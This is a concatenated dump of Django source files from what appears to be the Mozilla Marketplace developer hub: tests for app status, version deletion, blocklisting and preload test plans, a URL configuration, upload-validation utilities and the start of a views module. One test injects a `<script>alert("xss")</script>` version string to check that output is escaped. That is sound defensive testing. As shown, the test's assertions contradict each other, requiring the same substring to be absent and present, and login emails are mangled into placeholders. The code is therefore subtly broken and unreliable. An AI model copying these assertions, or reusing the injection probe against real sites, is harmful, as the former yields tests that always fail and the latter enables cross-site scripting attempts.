eq_(doc('#modal-delete').length, 1)
eq_(doc('#modal-disable').length, 1)
eq_(doc('#modal-delete-version').length, 0)
def test_delete_link(self):
# Hard "Delete App" link should be visible for only incomplete apps.
self.webapp.update(status=amo.STATUS_NULL)
doc = pq(self.client.get(self.url).content)
eq_(doc('#delete-addon').length, 1)
eq_(doc('#modal-delete').length, 1)
def test_pending(self):
self.webapp.update(status=amo.STATUS_PENDING)
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('#version-status .status-pending').length, 1)
eq_(doc('#rejection').length, 0)
def test_public(self):
eq_(self.webapp.status, amo.STATUS_PUBLIC)
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('#version-status .status-public').length, 1)
eq_(doc('#rejection').length, 0)
def test_blocked(self):
self.webapp.update(status=amo.STATUS_BLOCKED)
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('#version-status .status-blocked').length, 1)
eq_(doc('#rejection').length, 0)
assert 'blocked by a site administrator' in doc.text()
def test_rejected(self):
comments = "oh no you di'nt!!"
amo.set_user(UserProfile.objects.get(username='admin'))
amo.log(amo.LOG.REJECT_VERSION, self.webapp,
self.webapp.current_version, user_id=999,
details={'comments': comments, 'reviewtype': 'pending'})
self.webapp.update(status=amo.STATUS_REJECTED)
(self.webapp.versions.latest()
.all_files[0].update(status=amo.STATUS_DISABLED))
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)('#version-status')
eq_(doc('.status-rejected').length, 1)
eq_(doc('#rejection').length, 1)
eq_(doc('#rejection blockquote').text(), comments)
my_reply = 'fixed just for u, brah'
r = self.client.post(self.url, {'notes': my_reply,
'resubmit-app': ''})
self.assertRedirects(r, self.url, 302)
webapp = self.get_webapp()
eq_(webapp.status, amo.STATUS_PENDING,
'Reapplied apps should get marked as pending')
eq_(webapp.versions.latest().all_files[0].status, amo.STATUS_PENDING,
'Files for reapplied apps should get marked as pending')
action = amo.LOG.WEBAPP_RESUBMIT
assert AppLog.objects.filter(
addon=webapp, activity_log__action=action.id).exists(), (
"Didn't find `%s` action in logs." % action.short)
def test_no_ratings_no_resubmit(self):
self.create_switch('iarc')
self.webapp.update(status=amo.STATUS_REJECTED)
r = self.client.post(self.url, {'notes': 'lol',
'resubmit-app': ''})
eq_(r.status_code, 403)
self.webapp.content_ratings.create(ratings_body=0, rating=0)
r = self.client.post(self.url, {'notes': 'lol',
'resubmit-app': ''})
self.assert3xx(r, self.webapp.get_dev_url('versions'))
def test_comm_thread_after_resubmission(self):
self.create_switch('comm-dashboard')
self.webapp.update(status=amo.STATUS_REJECTED)
amo.set_user(UserProfile.objects.get(username='admin'))
(self.webapp.versions.latest()
.all_files[0].update(status=amo.STATUS_DISABLED))
my_reply = 'no give up'
self.client.post(self.url, {'notes': my_reply,
'resubmit-app': ''})
notes = CommunicationNote.objects.all()
eq_(notes.count(), 1)
eq_(notes[0].body, my_reply)
def test_rejected_packaged(self):
self.webapp.update(is_packaged=True)
comments = "oh no you di'nt!!"
amo.set_user(UserProfile.objects.get(username='admin'))
amo.log(amo.LOG.REJECT_VERSION, self.webapp,
self.webapp.current_version, user_id=999,
details={'comments': comments, 'reviewtype': 'pending'})
self.webapp.update(status=amo.STATUS_REJECTED)
(self.webapp.versions.latest()
.all_files[0].update(status=amo.STATUS_DISABLED))
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)('#version-status')
eq_(doc('.status-rejected').length, 1)
eq_(doc('#rejection').length, 1)
eq_(doc('#rejection blockquote').text(), comments)
@mock.patch('mkt.webapps.tasks.update_cached_manifests.delay', new=mock.Mock)
class TestAddVersion(BasePackagedAppTest):
def setUp(self):
super(TestAddVersion, self).setUp()
self.app = amo.tests.app_factory(
complete=True, is_packaged=True, version_kw=dict(version='1.0'))
self.url = self.app.get_dev_url('versions')
self.user = UserProfile.objects.get(username='regularuser')
AddonUser.objects.create(user=self.user, addon=self.app)
def _post(self, expected_status=200):
res = self.client.post(self.url, {'upload': self.upload.pk,
'upload-version': ''})
eq_(res.status_code, expected_status)
return res
def test_post(self):
self.app.current_version.update(version='0.9',
created=self.days_ago(1))
self._post(302)
version = self.app.versions.latest()
eq_(version.version, '1.0')
eq_(version.all_files[0].status, amo.STATUS_PENDING)
def test_post_subscribers(self):
# Same test as above, but add a suscriber. We only want to make sure
# we are not causing a traceback because of that.
reviewer = UserProfile.objects.create(email='[email protected]')
self.grant_permission(reviewer, 'Apps:Review')
EditorSubscription.objects.create(addon=self.app, user=reviewer)
self.app.current_version.update(version='0.9',
created=self.days_ago(1))
self._post(302)
version = self.app.versions.latest()
eq_(version.version, '1.0')
eq_(version.all_files[0].status, amo.STATUS_PENDING)
def test_unique_version(self):
res = self._post(200)
self.assertFormError(res, 'upload_form', 'upload',
'Version 1.0 already exists')
def test_pending_on_new_version(self):
# Test app rejection, then new version, updates app status to pending.
self.app.current_version.update(version='0.9',
created=self.days_ago(1))
self.app.update(status=amo.STATUS_REJECTED)
files = File.objects.filter(version__addon=self.app)
files.update(status=amo.STATUS_DISABLED)
self._post(302)
self.app.reload()
version = self.app.versions.latest()
eq_(version.version, '1.0')
eq_(version.all_files[0].status, amo.STATUS_PENDING)
eq_(self.app.status, amo.STATUS_PENDING)
@mock.patch('mkt.developers.views.run_validator')
def test_prefilled_features(self, run_validator_):
run_validator_.return_value = '{"feature_profile": ["apps", "audio"]}'
self.app.current_version.update(version='0.9',
created=self.days_ago(1))
# All features should be disabled.
features = self.app.current_version.features.to_dict()
eq_(any(features.values()), False)
self._post(302)
# In this new version we should be prechecked new ones.
features = self.app.versions.latest().features.to_dict()
for key, feature in features.iteritems():
eq_(feature, key in ('has_apps', 'has_audio'))
def test_blocklist_on_new_version(self):
# Test app blocked, then new version, doesn't update app status, and
# app shows up in escalation queue.
self.app.current_version.update(version='0.9',
created=self.days_ago(1))
self.app.update(status=amo.STATUS_BLOCKED)
files = File.objects.filter(version__addon=self.app)
files.update(status=amo.STATUS_DISABLED)
self._post(302)
version = self.app.versions.latest()
eq_(version.version, '1.0')
eq_(version.all_files[0].status, amo.STATUS_PENDING)
self.app.update_status()
eq_(self.app.status, amo.STATUS_BLOCKED)
assert EscalationQueue.objects.filter(addon=self.app).exists(), (
'App not in escalation queue')
def test_new_version_when_incomplete(self):
self.app.current_version.update(version='0.9',
created=self.days_ago(1))
self.app.update(status=amo.STATUS_NULL)
files = File.objects.filter(version__addon=self.app)
files.update(status=amo.STATUS_DISABLED)
self._post(302)
self.app.reload()
version = self.app.versions.latest()
eq_(version.version, '1.0')
eq_(version.all_files[0].status, amo.STATUS_PENDING)
eq_(self.app.status, amo.STATUS_PENDING)
def test_vip_app_added_to_escalation_queue(self):
self.app.current_version.update(version='0.9',
created=self.days_ago(1))
self.app.update(vip_app=True)
self._post(302)
assert EscalationQueue.objects.filter(addon=self.app).exists(), (
'VIP App not in escalation queue')
class TestVersionPackaged(amo.tests.WebappTestCase):
fixtures = fixture('user_999', 'webapp_337141')
def setUp(self):
super(TestVersionPackaged, self).setUp()
assert self.client.login(username='[email protected]',
password='password')
self.app.update(is_packaged=True)
self.app = self.get_app()
self.url = self.app.get_dev_url('versions')
self.delete_url = self.app.get_dev_url('versions.delete')
def test_items_packaged(self):
doc = pq(self.client.get(self.url).content)
eq_(doc('#version-status').length, 1)
eq_(doc('#version-list').length, 1)
eq_(doc('#delete-addon').length, 1)
eq_(doc('#modal-delete').length, 1)
eq_(doc('#modal-disable').length, 1)
eq_(doc('#modal-delete-version').length, 1)
def test_version_list_packaged(self):
self.app.update(is_packaged=True)
amo.tests.version_factory(addon=self.app, version='2.0',
file_kw=dict(status=amo.STATUS_PENDING))
self.app = self.get_app()
doc = pq(self.client.get(self.url).content)
eq_(doc('#version-status').length, 1)
eq_(doc('#version-list tbody tr').length, 2)
# 1 pending and 1 public.
eq_(doc('#version-list span.status-pending').length, 1)
eq_(doc('#version-list span.status-public').length, 1)
# Check version strings and order of versions.
eq_(map(lambda x: x.text, doc('#version-list h4 a')),
['2.0', '1.0'])
# There should be 2 delete buttons.
eq_(doc('#version-list a.delete-version.button').length, 2)
# Check download url.
eq_(doc('#version-list a.download').eq(0).attr('href'),
self.app.versions.all()[0].all_files[0].get_url_path(''))
eq_(doc('#version-list a.download').eq(1).attr('href'),
self.app.versions.all()[1].all_files[0].get_url_path(''))
def test_delete_version(self):
version = self.app.versions.latest()
version.update(version='<script>alert("xss")</script>')
res = self.client.get(self.url)
assert not '<script>alert(' in res.content
assert '<script>alert(' in res.content
# Now do the POST to delete.
res = self.client.post(self.delete_url, dict(version_id=version.pk),
follow=True)
assert not Version.objects.filter(pk=version.pk).exists()
eq_(ActivityLog.objects.filter(action=amo.LOG.DELETE_VERSION.id)
.count(), 1)
# Since this was the last version, the app status should be incomplete.
eq_(self.get_app().status, amo.STATUS_NULL)
# Check xss in success flash message.
assert not '<script>alert(' in res.content
assert '<script>alert(' in res.content
# Test that the soft deletion works pretty well.
eq_(self.app.versions.count(), 0)
# We can't use `.reload()` :(
version = Version.with_deleted.filter(addon=self.app)
eq_(version.count(), 1)
# Test that the status of the "deleted" version is STATUS_DELETED.
eq_(str(version[0].status[0]),
str(amo.MKT_STATUS_CHOICES[amo.STATUS_DELETED]))
def test_anonymous_delete_redirects(self):
self.client.logout()
version = self.app.versions.latest()
res = self.client.post(self.delete_url, dict(version_id=version.pk))
self.assertLoginRedirects(res, self.delete_url)
def test_non_author_no_delete_for_you(self):
self.client.logout()
assert self.client.login(username='[email protected]',
password='password')
version = self.app.versions.latest()
res = self.client.post(self.delete_url, dict(version_id=version.pk))
eq_(res.status_code, 403)
@mock.patch.object(Version, 'delete')
def test_roles_and_delete(self, mock_version):
user = UserProfile.objects.get(email='[email protected]')
addon_user = AddonUser.objects.create(user=user, addon=self.app)
allowed = [amo.AUTHOR_ROLE_OWNER, amo.AUTHOR_ROLE_DEV]
for role in [r[0] for r in amo.AUTHOR_CHOICES]:
self.client.logout()
addon_user.role = role
addon_user.save()
assert self.client.login(username='[email protected]',
password='password')
version = self.app.versions.latest()
res = self.client.post(self.delete_url,
dict(version_id=version.pk))
if role in allowed:
self.assert3xx(res, self.url)
assert mock_version.called, ('Unexpected: `Version.delete` '
'should have been called.')
mock_version.reset_mock()
else:
eq_(res.status_code, 403)
def test_cannot_delete_blocked(self):
v = self.app.versions.latest()
f = v.all_files[0]
f.update(status=amo.STATUS_BLOCKED)
res = self.client.post(self.delete_url, dict(version_id=v.pk))
eq_(res.status_code, 403)
def test_dev_cannot_blocklist(self):
url = self.app.get_dev_url('blocklist')
res = self.client.post(url)
eq_(res.status_code, 403)
@mock.patch('lib.crypto.packaged.os.unlink', new=mock.Mock)
def test_admin_can_blocklist(self):
self.grant_permission(UserProfile.objects.get(username='regularuser'),
'Apps:Configure')
assert self.client.login(username='[email protected]',
password='password')
v_count = self.app.versions.count()
url = self.app.get_dev_url('blocklist')
res = self.client.post(url)
self.assert3xx(res, self.app.get_dev_url('versions'))
app = self.app.reload()
eq_(app.versions.count(), v_count + 1)
eq_(app.status, amo.STATUS_BLOCKED)
eq_(app.versions.latest().files.latest().status, amo.STATUS_BLOCKED)
class TestPreloadSubmit(amo.tests.TestCase):
fixtures = fixture('group_admin', 'user_admin', 'user_admin_group',
'webapp_337141')
def setUp(self):
self.create_switch('preload-apps')
self.user = UserProfile.objects.get(username='admin')
self.login(self.user)
self.webapp = Addon.objects.get(id=337141)
self.url = self.webapp.get_dev_url('versions')
self.home_url = self.webapp.get_dev_url('preload_home')
self.submit_url = self.webapp.get_dev_url('preload_submit')
path = os.path.dirname(os.path.abspath(__file__))
self.test_pdf = path + '/files/test.pdf'
self.test_xls = path + '/files/test.xls'
def _submit_pdf(self):
f = open(self.test_pdf, 'r')
req = req_factory_factory(self.submit_url, user=self.user, post=True,
data={'agree': True, 'test_plan': f})
return preload_submit(req, self.webapp.slug)
def test_get_200(self):
eq_(self.client.get(self.home_url).status_code, 200)
eq_(self.client.get(self.submit_url).status_code, 200)
@mock.patch('mkt.developers.views.save_test_plan')
@mock.patch('mkt.developers.views.messages')
def test_preload_on_status_page(self, noop1, noop2):
req = req_factory_factory(self.url, user=self.user)
r = status(req, self.webapp.slug)
doc = pq(r.content)
eq_(doc('#preload .listing-footer a').attr('href'),
self.webapp.get_dev_url('preload_home'))
assert doc('#preload .not-submitted')
self._submit_pdf()
req = req_factory_factory(self.url, user=self.user)
r = status(req, self.webapp.slug)
doc = pq(r.content)
eq_(doc('#preload .listing-footer a').attr('href'),
self.webapp.get_dev_url('preload_submit'))
assert doc('#preload .submitted')
def _assert_submit(self, endswith, content_type, save_mock):
test_plan = PreloadTestPlan.objects.get()
eq_(test_plan.addon, self.webapp)
assert test_plan.filename.startswith('test_plan_')
assert test_plan.filename.endswith(endswith)
self.assertCloseToNow(test_plan.last_submission)
eq_(save_mock.call_args[0][0].content_type, content_type)
assert save_mock.call_args[0][1].startswith('test_plan')
eq_(save_mock.call_args[0][2], self.webapp)
@mock.patch('mkt.developers.views.save_test_plan')
@mock.patch('mkt.developers.views.messages')
def test_submit_pdf(self, noop, save_mock):
r = self._submit_pdf()
self.assert3xx(r, self.url)
self._assert_submit('pdf', 'application/pdf', save_mock)
@mock.patch('mkt.developers.views.save_test_plan')
@mock.patch('mkt.developers.views.messages')
def test_submit_xls(self, noop, save_mock):
f = open(self.test_xls, 'r')
req = req_factory_factory(self.submit_url, user=self.user, post=True,
data={'agree': True, 'test_plan': f})
r = preload_submit(req, self.webapp.slug)
self.assert3xx(r, self.url)
self._assert_submit('xls', 'application/vnd.ms-excel', save_mock)
@mock.patch('mkt.developers.views.save_test_plan')
@mock.patch('mkt.developers.views.messages')
def test_submit_bad_file(self, noop, save_mock):
f = open(os.path.abspath(__file__), 'r')
req = req_factory_factory(self.submit_url, user=self.user, post=True,
data={'agree': True, 'test_plan': f})
r = preload_submit(req, self.webapp.slug)
eq_(r.status_code, 200)
eq_(PreloadTestPlan.objects.count(), 0)
assert not save_mock.called
assert ('Invalid file type.' in
pq(r.content)('.test_plan .errorlist').text())
@mock.patch('mkt.developers.views.save_test_plan')
@mock.patch('mkt.developers.views.messages')
def test_submit_no_file(self, noop, save_mock):
req = req_factory_factory(self.submit_url, user=self.user, post=True,
data={'agree': True})
r = preload_submit(req, self.webapp.slug)
eq_(r.status_code, 200)
eq_(PreloadTestPlan.objects.count(), 0)
assert not save_mock.called
assert 'required' in pq(r.content)('.test_plan .errorlist').text()
@mock.patch('mkt.developers.views.save_test_plan')
@mock.patch('mkt.developers.views.messages')
def test_submit_no_agree(self, noop, save_mock):
f = open(self.test_xls, 'r')
req = req_factory_factory(self.submit_url, user=self.user, post=True,
data={'test_plan': f})
r = preload_submit(req, self.webapp.slug)
eq_(r.status_code, 200)
eq_(PreloadTestPlan.objects.count(), 0)
assert not save_mock.called
assert 'required' in pq(r.content)('.agree .errorlist').text()
@mock.patch('mkt.developers.views.save_test_plan')
@mock.patch('mkt.developers.views.messages')
def test_submit_multiple_status(self, noop, save_mock):
f = open(self.test_xls, 'r')
req = req_factory_factory(self.submit_url, user=self.user, post=True,
data={'test_plan': f, 'agree': True})
preload_submit(req, self.webapp.slug)
self._submit_pdf()
eq_(PreloadTestPlan.objects.count(), 2)
xls = PreloadTestPlan.objects.get(filename__contains='xls')
pdf = PreloadTestPlan.objects.get(filename__contains='pdf')
eq_(xls.status, amo.STATUS_DISABLED)
eq_(pdf.status, amo.STATUS_PUBLIC)
# Check the link points to most recent one.
req = req_factory_factory(self.url, user=self.user)
r = status(req, self.webapp.slug)
doc = pq(r.content)
eq_(doc('.test-plan-download').attr('href'),
pdf.preload_test_plan_url)
@mock.patch.object(settings, 'PREINSTALL_TEST_PLAN_LATEST',
datetime.datetime.now() + datetime.timedelta(days=1))
@mock.patch('mkt.developers.views.save_test_plan')
@mock.patch('mkt.developers.views.messages')
def test_outdated(self, noop, save_mock):
self._submit_pdf()
req = req_factory_factory(self.url, user=self.user)
r = status(req, self.webapp.slug)
doc = pq(r.content)
assert doc('.outdated')
########NEW FILE########
__FILENAME__ = urls
from django import http
from django.conf.urls import include, patterns, url
from django.core.urlresolvers import reverse
from rest_framework.routers import SimpleRouter
import amo
from amo.decorators import write
from lib.misc.urlconf_decorator import decorate
from mkt.api.base import SubRouter
from mkt.developers.api_payments import (
AddonPaymentAccountViewSet, PaymentAccountViewSet, PaymentCheckViewSet,
PaymentDebugViewSet, UpsellViewSet)
from mkt.developers.decorators import use_apps
from mkt.developers.views import ContentRatingList, ContentRatingsPingback
from mkt.inapp.views import InAppProductViewSet
from mkt.receipts.urls import test_patterns
from . import views
from . import views_payments
def provider_patterns(prefix):
return patterns('',
url('^accounts$', views_payments.payment_accounts,
name='mkt.developers.%s.payment_accounts' % prefix),
url('^accounts/form$', views_payments.payment_accounts_form,
name='mkt.developers.%s.payment_accounts_form' % prefix),
url('^accounts/add$', views_payments.payments_accounts_add,
name='mkt.developers.%s.add_payment_account' % prefix),
url('^accounts/(?P<id>\d+)/delete$',
views_payments.payments_accounts_delete,
name='mkt.developers.%s.delete_payment_account' % prefix),
url('^accounts/(?P<id>\d+)$',
views_payments.payments_account,
name='mkt.developers.%s.payment_account' % prefix),
url('^accounts/(?P<id>\d+)/agreement/$', views_payments.agreement,
name='mkt.developers.%s.agreement' % prefix)
)
# These will all start with /app/<app_slug>/
app_detail_patterns = patterns('',
# Redirect people who go to / instead of /edit.
('^$', lambda r, app_slug: http.HttpResponseRedirect(
reverse('mkt.developers.apps.edit', args=[app_slug]))),
url('^edit$', views.edit, name='mkt.developers.apps.edit'),
url('^edit_(?P<section>[^/]+)(?:/(?P<editable>[^/]+))?$',
views.addons_section, name='mkt.developers.apps.section'),
url('^refresh_manifest$', views.refresh_manifest,
name='mkt.developers.apps.refresh_manifest'),
url('^ownership$', views.ownership, name='mkt.developers.apps.owner'),
url('^enable$', views.enable, name='mkt.developers.apps.enable'),
url('^delete$', views.delete, name='mkt.developers.apps.delete'),
url('^disable$', views.disable, name='mkt.developers.apps.disable'),
url('^publicise$', views.publicise, name='mkt.developers.apps.publicise'),
url('^status$', views.status, name='mkt.developers.apps.versions'),
url('^blocklist$', views.blocklist, name='mkt.developers.apps.blocklist'),
# Only present if DEBUG=True.
url('^debug/', views.debug, name='mkt.developers.debug'),
# IARC content ratings.
url('^content_ratings$', views.content_ratings,
name='mkt.developers.apps.ratings'),
url('^content_ratings/edit$', views.content_ratings_edit,
name='mkt.developers.apps.ratings_edit'),
url('^status/preload$', views.preload_home,
name='mkt.developers.apps.preload_home'),
url('^status/preload/submit$', views.preload_submit,
name='mkt.developers.apps.preload_submit'),
# TODO: '^versions/$'
url('^versions/(?P<version_id>\d+)$', views.version_edit,
name='mkt.developers.apps.versions.edit'),
url('^versions/delete$', views.version_delete,
name='mkt.developers.apps.versions.delete'),
url('^versions/publicise$', views.version_publicise,
name='mkt.developers.apps.versions.publicise'),
url('^payments/$', views_payments.payments,
name='mkt.developers.apps.payments'),
url('^payments/disable$', views_payments.disable_payments,
name='mkt.developers.apps.payments.disable'),
url('^payments/bango-portal$', views_payments.bango_portal_from_addon,
name='mkt.developers.apps.payments.bango_portal_from_addon'),
# in-app payments.
url('^in-app-config/$', views_payments.in_app_config,
name='mkt.developers.apps.in_app_config'),
url('^in-app-products/$', views_payments.in_app_products,
name='mkt.developers.apps.in_app_products'),
url('^in-app-secret/$', views_payments.in_app_secret,
name='mkt.developers.apps.in_app_secret'),
# Old stuff.
url('^upload_preview$', views.upload_media, {'upload_type': 'preview'},
name='mkt.developers.apps.upload_preview'),
url('^upload_icon$', views.upload_media, {'upload_type': 'icon'},
name='mkt.developers.apps.upload_icon'),
url('^upload_image$', views.upload_media, {'upload_type': 'image'},
name='mkt.developers.apps.upload_image'),
url('^rmlocale$', views.remove_locale,
name='mkt.developers.apps.remove-locale'),
# Not apps-specific (yet).
url('^file/(?P<file_id>[^/]+)/validation$', views.file_validation,
name='mkt.developers.apps.file_validation'),
url('^file/(?P<file_id>[^/]+)/validation.json$',
views.json_file_validation,
name='mkt.developers.apps.json_file_validation'),
url('^upload$', views.upload_for_addon,
name='mkt.developers.upload_for_addon'),
url('^upload/(?P<uuid>[^/]+)$', views.upload_detail_for_addon,
name='mkt.developers.upload_detail_for_addon'),
)
# These will all start with /ajax/app/<app_slug>/
ajax_patterns = patterns('',
url('^image/status$', views.image_status,
name='mkt.developers.apps.ajax.image.status'),
)
urlpatterns = decorate(write, patterns('',
# Redirect people who have /apps/ instead of /app/.
('^apps/\d+/.*',
lambda r: http.HttpResponseRedirect(r.path.replace('apps', 'app', 1))),
# Standalone validator:
url('^validator/?$', views.validate_addon,
name='mkt.developers.validate_addon'),
# Redirect to /addons/ at the base.
url('^submissions$', use_apps(views.dashboard),
name='mkt.developers.apps'),
url('^upload$', views.upload_new, name='mkt.developers.upload'),
url('^upload/([^/]+)(?:/([^/]+))?$', views.upload_detail,
name='mkt.developers.upload_detail'),
url('^standalone-hosted-upload$', views.standalone_hosted_upload,
name='mkt.developers.standalone_hosted_upload'),
url('^standalone-packaged-upload$', views.standalone_packaged_upload,
name='mkt.developers.standalone_packaged_upload'),
url('^standalone-(hosted|packaged)-upload/([^/]+)$',
views.standalone_upload_detail,
name='mkt.developers.standalone_upload_detail'),
# Standalone tools.
url('^upload-manifest$', views.upload_manifest,
name='mkt.developers.upload_manifest'),
url('^in-app-keys/$', views_payments.in_app_keys,
name='mkt.developers.apps.in_app_keys'),
url('^in-app-key-secret/([^/]+)$', views_payments.in_app_key_secret,
name='mkt.developers.apps.in_app_key_secret'),
# URLs for a single app.
url('^app/%s/' % amo.APP_SLUG, include(app_detail_patterns)),
url('^ajax/app/%s/' % amo.APP_SLUG, include(ajax_patterns)),
url('^terms$', views.terms, name='mkt.developers.apps.terms'),
url('^api$', views.api, name='mkt.developers.apps.api'),
# Developer docs
url('docs/(?P<doc_name>[-_\w]+)?$',
views.docs, name='mkt.developers.docs'),
url('docs/(?P<doc_name>[-_\w]+)/(?P<doc_page>[-_\w]+)',
views.docs, name='mkt.developers.docs'),
url('^transactions/', views.transactions,
name='mkt.developers.transactions'),
# Bango-specific stuff.
url('^provider/', include(provider_patterns('provider'))),
url('^test/$', views.testing, name='mkt.developers.apps.testing'),
url('^test/receipts/', include(test_patterns)),
))
api_payments = SimpleRouter()
api_payments.register(r'account', PaymentAccountViewSet,
base_name='payment-account')
api_payments.register(r'upsell', UpsellViewSet, base_name='app-upsell')
api_payments.register(r'app', AddonPaymentAccountViewSet,
base_name='app-payment-account')
in_app_products = SimpleRouter()
in_app_products.register(r'in-app', InAppProductViewSet,
base_name='in-app-products')
app_payments = SubRouter()
app_payments.register(r'payments/status', PaymentCheckViewSet,
base_name='app-payments-status')
app_payments.register(r'payments/debug', PaymentDebugViewSet,
base_name='app-payments-debug')
payments_api_patterns = patterns('',
url(r'^payments/', include(api_payments.urls)),
url(r'^payments/(?P<app_slug>[^\/]+)/', include(in_app_products.urls)),
url(r'^apps/app/', include(app_payments.urls)),
)
dev_api_patterns = patterns('',
url(r'^apps/app/(?P<pk>[^/<>"\']+)/content-ratings/pingback/',
ContentRatingsPingback.as_view(), name='content-ratings-pingback'),
url(r'^apps/app/(?P<pk>[^/<>"\']+)/content-ratings/',
ContentRatingList.as_view(), name='content-ratings-list'),
)
########NEW FILE########
__FILENAME__ = utils
import os
import uuid
from datetime import datetime
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.template.defaultfilters import filesizeformat
import commonware.log
import waffle
from PIL import Image
from tower import ugettext as _
import amo
from amo.helpers import absolutify
from editors.models import EscalationQueue
from lib.video import library as video_library
from mkt.comm.utils import create_comm_note
from mkt.constants import APP_PREVIEW_MINIMUMS
from mkt.constants import comm
from mkt.reviewers.utils import send_mail
log = commonware.log.getLogger('z.devhub')
def uri_to_pk(uri):
"""
Convert a resource URI to the primary key of the resource.
"""
return uri.rstrip('/').split('/')[-1]
def check_upload(file_obj, upload_type, content_type):
errors = []
upload_hash = ''
is_icon = upload_type == 'icon'
is_preview = upload_type == 'preview'
is_video = content_type in amo.VIDEO_TYPES
if not any([is_icon, is_preview, is_video]):
raise ValueError('Unknown upload type.')
# By pushing the type onto the instance hash, we can easily see what
# to do with the file later.
ext = content_type.replace('/', '-')
upload_hash = '%s.%s' % (uuid.uuid4().hex, ext)
loc = os.path.join(settings.TMP_PATH, upload_type, upload_hash)
with storage.open(loc, 'wb') as fd:
for chunk in file_obj:
fd.write(chunk)
# A flag to prevent us from attempting to open the image with PIL.
do_not_open = False
if is_video:
if not video_library:
errors.append(_('Video support not enabled.'))
else:
video = video_library(loc)
video.get_meta()
if not video.is_valid():
errors.extend(video.errors)
else:
check = amo.utils.ImageCheck(file_obj)
if (not check.is_image() or
content_type not in amo.IMG_TYPES):
do_not_open = True
if is_icon:
errors.append(_('Icons must be either PNG or JPG.'))
else:
errors.append(_('Images must be either PNG or JPG.'))
if check.is_animated():
do_not_open = True
if is_icon:
errors.append(_('Icons cannot be animated.'))
else:
errors.append(_('Images cannot be animated.'))
max_size = (settings.MAX_ICON_UPLOAD_SIZE if is_icon else
settings.MAX_VIDEO_UPLOAD_SIZE if is_video else
settings.MAX_IMAGE_UPLOAD_SIZE if is_preview else None)
if max_size and file_obj.size > max_size:
do_not_open = True
if is_icon or is_video:
errors.append(_('Please use files smaller than %s.') %
filesizeformat(max_size))
if (is_icon or is_preview) and not is_video and not do_not_open:
file_obj.seek(0)
try:
im = Image.open(file_obj)
im.verify()
except IOError:
if is_icon:
errors.append(_('Icon could not be opened.'))
elif is_preview:
errors.append(_('Preview could not be opened.'))
else:
size_x, size_y = im.size
if is_icon:
# TODO: This should go away when we allow uploads for
# individual icon sizes.
if size_x < 128 or size_y < 128:
errors.append(_('Icons must be at least 128px by 128px.'))
if size_x != size_y:
errors.append(_('Icons must be square.'))
elif is_preview:
if (size_x < APP_PREVIEW_MINIMUMS[0] or
size_y < APP_PREVIEW_MINIMUMS[1]) and (
size_x < APP_PREVIEW_MINIMUMS[1] or
size_y < APP_PREVIEW_MINIMUMS[0]):
errors.append(
# L10n: {0} and {1} are the height/width of the preview
# in px.
_('App previews must be at least {0}px by {1}px or '
'{1}px by {0}px.').format(*APP_PREVIEW_MINIMUMS))
return errors, upload_hash
def handle_vip(addon, version, user):
msg = u'VIP app updated'
# Add to escalation queue
EscalationQueue.objects.get_or_create(addon=addon)
# Create comm note
create_comm_note(addon, version, user, msg, note_type=comm.ESCALATION,
perms={'developer': False})
# Log action
amo.log(amo.LOG.ESCALATION_VIP_APP, addon, version, created=datetime.now(),
details={'comments': msg})
log.info(u'[app:%s] escalated - %s' % (addon.name, msg))
# Special senior reviewer email.
if not waffle.switch_is_active('comm-dashboard'):
context = {'name': addon.name,
'review_url': absolutify(reverse('reviewers.apps.review',
args=[addon.app_slug],
add_prefix=False)),
'SITE_URL': settings.SITE_URL}
send_mail(u'%s: %s' % (msg, addon.name),
'developers/emails/vip_escalation.ltxt', context,
[settings.MKT_SENIOR_EDITORS_EMAIL])
########NEW FILE########
__FILENAME__ = views
import json
import os
import sys
import time
import traceback
from collections import defaultdict
from datetime import datetime
from django import forms as django_forms
from django import http
from django.conf import settings
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.db import transaction
from django.shortcuts import get_object_or_404, redirect, render
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_exempt
import commonware.log
import waffle
from rest_framework import status as http_status
from rest_framework.generics import CreateAPIView, ListAPIView
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from session_csrf import anonymous_csrf, anonymous_csrf_exempt
from tower import ugettext as _, ugettext_lazy as _lazy
from waffle.decorators import waffle_switch
import amo
import amo.utils
import lib.iarc
from access import acl
from addons import forms as addon_forms
from addons.decorators import addon_view
from addons.models import Addon, AddonUser
from addons.views import BaseFilter
from amo import messages
from amo.decorators import (any_permission_required, json_view, login_required,
post_required, skip_cache, write)
from amo.utils import escape_all
from devhub.models import AppLog
from files.models import File, FileUpload
from files.utils import parse_addon
from lib.iarc.utils import get_iarc_app_title
from mkt.api.base import CORSMixin, SlugOrIdMixin
from mkt.api.models import Access, generate
from mkt.comm.utils import create_comm_note
from mkt.constants import comm
from mkt.developers.decorators import dev_required
from mkt.developers.forms import (APIConsumerForm, AppFormBasic,
AppFormDetails, AppFormMedia, AppFormSupport,
AppFormTechnical, AppVersionForm,
CategoryForm, ContentRatingForm,
IARCGetAppInfoForm, NewPackagedAppForm,
PreloadTestPlanForm, PreviewFormSet,
TransactionFilterForm, trap_duplicate)
from mkt.developers.models import PreloadTestPlan
from mkt.developers.serializers import ContentRatingSerializer
from mkt.developers.tasks import run_validator, save_test_plan
from mkt.developers.utils import check_upload, handle_vip
from mkt.submit.forms import AppFeaturesForm, NewWebappVersionForm
from mkt.webapps.models import ContentRating, IARCInfo, Webapp
from mkt.webapps.tasks import _update_manifest, update_manifests
from mkt.webpay.webpay_jwt import get_product_jwt, WebAppProduct
from stats.models import Contribution
from users.models import UserProfile
from users.views import _login
from versions.models import Version
from . import forms, tasks
log = commonware.log.getLogger('z.devhub')
# We use a session cookie to make sure people see the dev agreement.
DEV_AGREEMENT_COOKIE = 'yes-I-read-the-dev-agreement'
class AddonFilter(BaseFilter):
opts = (('name', _lazy(u'Name')),
('updated', _lazy(u'Updated')),
('created', _lazy(u'Created')),
('popular', _lazy(u'Downloads')),
('rating', _lazy(u'Rating')))
class AppFilter(BaseFilter):
opts = (('name', _lazy(u'Name')),
('created', _lazy(u'Created')))
def addon_listing(request, default='name', webapp=False):
